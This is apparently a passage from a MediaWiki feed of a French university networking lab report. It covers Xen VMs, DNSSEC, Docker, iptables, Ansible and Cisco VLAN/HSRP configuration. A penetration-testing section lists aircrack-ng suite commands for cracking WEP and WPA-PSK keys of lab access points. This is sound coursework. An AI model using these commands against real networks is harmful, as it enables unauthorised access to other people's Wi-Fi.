La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51993</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51993"/>
				<updated>2020-01-02T22:53:01Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du Routeur 1 (R1) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
